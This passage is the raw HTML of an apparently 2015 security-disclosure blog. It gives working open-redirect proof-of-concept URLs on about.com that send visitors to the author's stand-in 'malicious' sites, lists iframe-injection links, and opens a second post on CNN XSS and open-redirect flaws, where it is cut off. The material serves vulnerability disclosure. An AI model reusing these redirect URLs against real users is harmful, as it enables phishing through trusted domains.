<a href="http://jobsearch.about.com/od/coverletters/a/types-sogou-outbrain-booking-chase-pixnet-reddit-pinterest-vk-msn-imdb-of-cover-qq-letters-bankofamerica-twitter-Wikia-Etsy.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://jobsearch.about.com/od/<wbr></wbr>coverletters/a/types-sogou-<wbr></wbr>outbrain-booking-chase-pixnet-<wbr></wbr>reddit-pinterest-vk-msn-imdb-<wbr></wbr>of-cover-qq-letters-<wbr></wbr>bankofamerica-twitter-Wikia-<wbr></wbr>Etsy.htm</span></a></div>
<div>
<a href="http://testprep.about.com/od/The-Redesigned-PSAT/fl/Redesigned-PSAT-101-Flickr-Globo-Xnxx-Tudou-Yelp-Douban-Ameblo-33-Vimeo-Ettoday-Redtube-Directrev-Salesforce-Coccoc.htm" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://testprep.about.com/od/<wbr></wbr>The-Redesigned-PSAT/fl/<wbr></wbr>Redesigned-PSAT-101-Flickr-<wbr></wbr>Globo-Xnxx-Tudou-Yelp-Douban-<wbr></wbr>Ameblo-33-Vimeo-Ettoday-<wbr></wbr>Redtube-Directrev-Salesforce-<wbr></wbr>Coccoc.htm</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b><br />
<a href="http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://fictionwriting.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com</span></a></div>
<div>
<a href="http://internationalinvest.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://internationalinvest.<wbr></wbr>about.com/gi/dynamic/offsite.<wbr></wbr>htm?zi=1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//tetraph.com</span></a></div>
<div>
<a href="http://inventors.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//itinfotechnology.wordpress.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://inventors.about.com/gi/<wbr></wbr>dynamic/offsite.htm?zi=1/XJ/<wbr></wbr>Ya&sdn=internationalinvest&<wbr></wbr>cdn=prep&tm=2&f=21&tt=14&bt=0&<wbr></wbr>bts=1&zu=http%3A//<wbr></wbr>itinfotechnology.wordpress.com</span></a></div>
<div>
<a href="http://sbinformation.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//tetraph.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://sbinformation.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//tetraph.com/security</span></a></div>
<div>
<a href="http://ancienthistory.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//inzeed.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ancienthistory.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//inzeed.com/security</span></a></div>
<div>
<a href="http://specialchildren.about.com/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://specialchildren.about.<wbr></wbr>com/gi/dynamic/offsite.htm?zi=<wbr></wbr>1/XJ/Ya&sdn=<wbr></wbr>internationalinvest&cdn=prep&<wbr></wbr>tm=2&f=21&tt=14&bt=0&bts=1&zu=<wbr></wbr>http%3A//diebiyi.com/security</span></a></div>
<div>
<div>
<a href="http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://womenshistory.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
<div>
<a href="http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://budgetdecorating.about.com/o/gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
<div>
<a href="http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://makeup.about.com//gi/dynamic/offsite.htm?zi=1/XJ/Ya&sdn=internationalinvest&cdn=prep&tm=2&f=21&tt=14&bt=0&bts=1&zu=http%3A//diebiyi.com/security</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
</div>
<div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b></div>
<div>
<a href="https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=hx_sdDmSkg0&feature=youtu.be</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
</div>
<div>
</div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b><br />
<a href="http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/iframe-injection/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-iframe-injection-cross-frame-scripting-security-attacks/</span></a><br />
<a href="http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypitch.com/about-group-about-com-content-network-vulnerable-to-xss-iframe-injection-security-attacks-433/</span></a><br />
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at.html</span></a></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(5) About (about.com) Open Redirect Multiple (Dest Redirect Privilege Escalation) Security Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">About Group online web application has a computer cyber security bug problem. It can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Use one of webpages for the following tests. The webpage address is "<a href="http://www.inzeed.com/kaleidoscope/" target="_blank">http://www.inzeed.com/<wbr></wbr>kaleidoscope/</a>". Suppose that this webpage is malicious.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 1:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<a href="http://www.about.com/snf.htm?u=http://www.instagram.com/facebook/craigslist" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/snf.htm?<wbr></wbr>u=http://www.instagram.com/<wbr></wbr>facebook/craigslist</span></a></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<a href="http://www.about.com/snf.htm?u=http://www.inzeed.com/essayjeans/poems/thatday.html" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.about.com/snf.htm?<wbr></wbr>u=http://www.inzeed.com/<wbr></wbr>essayjeans/poems/thatday.html</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 2:</span></b></div>
<div>
<a href="http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://paypal.com/imgur/xinhuanet" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://clk.about.com/?zi=13/<wbr></wbr>1tO&ity=boostOrg&o=0&eng=<wbr></wbr>boost&zu=http://paypal.com/<wbr></wbr>imgur/xinhuanet</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<a href="http://clk.about.com/?zi=13/1tO&ity=boostOrg&o=0&eng=boost&zu=http://www.inzeed.com/netflix/stackoverflow" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://clk.about.com/?zi=13/<wbr></wbr>1tO&ity=boostOrg&o=0&eng=<wbr></wbr>boost&zu=http://www.inzeed.<wbr></wbr>com/netflix/stackoverflow</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL 3:</span></b></div>
<div>
<a href="http://wzus1.index.about.com/r?t=v&d=im&u=http%3A%2F%2Ft.co%2fxvideos%2fsoso%2f%naver%2fkickass.so" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://wzus1.index.about.com/<wbr></wbr>r?t=v&d=im&u=http%3A%2F%2Ft.<wbr></wbr>co%2fxvideos%2fsoso%2f%naver%<wbr></wbr>2fkickass.so</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://wzus1.index.about.com/r?t=v&d=im&u=http://www.diebiyi.com/xhamster/diply/onclickads.net" target="_blank">http://wzus1.index.about.com/<wbr></wbr>r?t=v&d=im&u=http://www.<wbr></wbr>diebiyi.com/xhamster/diply/<wbr></wbr>onclickads.net</a> </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">POC Video:</span></b><br />
<a href="https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.youtube.com/watch?v=8ZCUAJ44FsU&feature=youtu.be</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b><br />
<a href="http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.com/security/open-redirect/about-about-com-open-redirect-multiple-dest-redirect-privilege-escalation-security-vulnerabilities/</span></a><br />
<a href="http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-aboutcom-unvalidated-redirects.html</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<br />
<div>
</div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="background-color: white;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Feb/9"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Feb/9</span></a></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/02/02/4"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/02/02/4</span></a></div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01647.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01647.html</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/02/about-group-aboutcom-all-topics-at_37.html</span></a></div>
</div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at-least-99-88-links-vulnerable-to-xss-iframe-injection-security-attacks-about-com-open-redirect-security-vulnerabilities/">http://tetraph.com/security/xss-vulnerability/about-group-about-com-all-topics-at</a></span></div>
<div style="background-color: white; margin: 0px;">
<a href="http://webcabinet.tumblr.com/post/118901412227/securitypost-about-group-99-88-xss"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://webcabinet.tumblr.com/post/118901412227/securitypost-about-group-99-88-xss</span></a></div>
<div style="background-color: white; margin: 0px;">
<a href="http://xingzhehong.lofter.com/post/1cfd0db2_6f05d60"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://xingzhehong.lofter.com/post/1cfd0db2_6f05d60</span></a></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://hackertopic.wordpress.com/2015/02/03/about-group-xss-xfs/" target="_blank">https://hackertopic.wordpress.<wbr></wbr>com/2015/02/03/about-group-<wbr></wbr>xss-xfs/</a></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itinfotech.tumblr.com/post/120845059171/about-group-xss-xfs" target="_blank">http://itinfotech.tumblr.com/<wbr></wbr>post/120845059171/about-group-<wbr></wbr>xss-xfs</a></span></div>
<div style="background-color: white;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itprompt.blogspot.com/2015/06/about-group-xss-xfs.html">http://itprompt.blogspot.com/<wbr></wbr>2015/06/about-group-xss-xfs.<wbr></wbr>html</a></span></div>
<div style="background-color: white;">
<a href="https://plus.google.com/u/0/100242269120759811496/posts/T3SbFnTZGAo"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/100242269120759811496/posts/T3SbFnTZGAo</span></a></div>
<div style="background-color: white; margin: 0px;">
<a href="https://itinfotechnology.wordpress.com/2015/03/24/about-group-%E8%B6%85%E8%BF%87-99-88-%E7%9A%84%E9%93%BE%E6%8E%A5%E5%AE%B9%E6%98%93%E9%81%AD%E5%8F%97-xss-%E5%92%8C-xfs-%E6%94%BB%E5%87%BB/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2015/03/24/about-group</span></a></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/websecuritiesnews/posts/803853789734793">https://www.facebook.com/websecuritiesnews/posts/803853789734793</a></span></div>
<div style="background-color: white; margin: 0px;">
<a href="https://twitter.com/essayjeans/status/607137800383655936"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/essayjeans/status/607137800383655936</span></a></div>
<div style="background-color: white; margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/2346030512015566409245/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/2346030512015566409245/</span></a></div>
<div style="background-color: white; margin: 0px;">
<span style="color: black; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/pcwebsecurities/posts/687872271358693">https://www.facebook.com/pcwebsecurities/posts/687872271358693</a></span></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://itsecurity.lofter.com/post/1cfbf9e7_733e1e5">http://itsecurity.lofter.com/post/1cfbf9e7_733e1e5</a></span></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://webtechwire.wordpress.com/2015/02/12/about-xss-xfs/">https://webtechwire.wordpress.com/2015/02/12/about-xss-xfs/</a></span></div>
<div style="background-color: white; margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/web-security/about-group-xss-xrf-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/web-security/about-group-xss-xrf-open-redirect/</span></a></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: white; margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="background-color: white; margin: 0px;">
</div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="background-color: white; margin: 0px;">
</div>
</div>
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-49395205992107193962015-06-05T23:32:00.000-07:002015-06-05T23:45:34.388-07:00CNN Travel.cnn.com XSS and Ads.cnn.com Open Redirect Web Security Vulnerabilities<div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-o8BrybHMygU/VXKAp_-z4xI/AAAAAAAAA_Y/G2fV-L3HfdI/s1600/cnn_travel_xss.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://2.bp.blogspot.com/-o8BrybHMygU/VXKAp_-z4xI/AAAAAAAAA_Y/G2fV-L3HfdI/s400/cnn_travel_xss.png" width="400" /></span></a></div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;">CNN Travel.cnn.com XSS and Ads.cnn.com Open Redirect Web Security Vulnerabilities</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">http://cnn.com</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">"The Cable News Network (CNN) is an American basic cable and satellite television channel that is owned by the Turner Broadcasting System division of Time Warner. The 24-hour cable news channel was founded in 1980 by American media proprietor Ted Turner. Upon its launch, CNN was the first television channel to provide 24-hour news coverage, and was the first all-news television channel in the United States. While the news channel has numerous affiliates, CNN primarily broadcasts from the Time Warner Center in New York City, and studios in Washington, D.C. and Los Angeles, its headquarters at the CNN Center in Atlanta is only used for weekend programming. CNN is sometimes referred to as CNN/U.S. to distinguish the American channel from its international sister network, CNN International. As of August 2010, CNN is available in over 100 million U.S. households. Broadcast coverage of the U.S. channel extends to over 890,000 American hotel rooms, as well as carriage on cable and satellite providers throughout Canada. Globally, CNN programming airs through CNN International, which can be seen by viewers in over 212 countries and territories. As of February 2015, CNN is available to approximately 96,289,000 cable, satellite and, telco television households (82.7% of households with at least one television set) in the United States." (Wikipedia)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br class="Apple-interchange-newline" />Discovered and Reported by:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="font-family: Arial, Helvetica, sans-serif; text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/549420227021115392">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></div>
<a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">CNN has a cyber security bug problem. It cab be exploited by XSS (Cross Site Scripting) and Open Redirect (Unvalidated Redirects and Forwards) attacks.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Based on news published, CNN users were hacked based on both Open Redirect and XSS vulnerabilities.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">According to E Hacker News on June 06, 2013, (@BreakTheSec) came across a diet spam campaign that leverages the open redirect vulnerability in one of the top News organization CNN.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">After the attack, CNN takes measures to detect Open Redirect vulnerabilities. The measure is quite good during the tests. Almost no links are vulnerable to Open Redirect attack on CNN's website, now. It takes long time to find a new Open Redirect vulnerability that is un-patched on its website.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">CNN.com was hacked by Open Redirect in 2013. While the XSS attacks happened in 2007.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><1></b> "The tweet apparently shows cyber criminals managed to leverage the open redirect security flaw in the CNN to redirect twitter users to the Diet spam websites."</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
